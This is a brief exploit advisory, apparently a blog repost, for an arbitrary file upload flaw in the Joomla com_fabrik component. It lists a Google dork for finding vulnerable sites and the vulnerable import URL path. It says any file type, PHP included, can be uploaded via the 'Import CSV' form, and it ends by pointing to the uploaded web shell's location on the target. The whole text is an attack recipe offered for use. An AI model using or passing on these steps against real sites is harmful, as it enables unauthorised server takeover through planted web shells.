Google Dork : inurl:index.php?option=com_fabrik or index.php?option=com_fabrik
Date : 14/09/2012
Exploit Author : D35m0nd142
Vendor Homepage : http://fabrikar.com/
Tested on : Mozilla Firefox on Ubuntu 12.04
Vulnerable path :
Code:
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
--
In this webpage there is the possibility of upload any type of files (php,asp,html,jpg .. ) through the form "Import CSV".
--
Screenshot of the uploading page --> http://imageshack.us/photo/my-images/269/comfabrik.png/
--
After uploaded shell go to --> http://[target]/media/yourshell.php
0 comments:
Post a Comment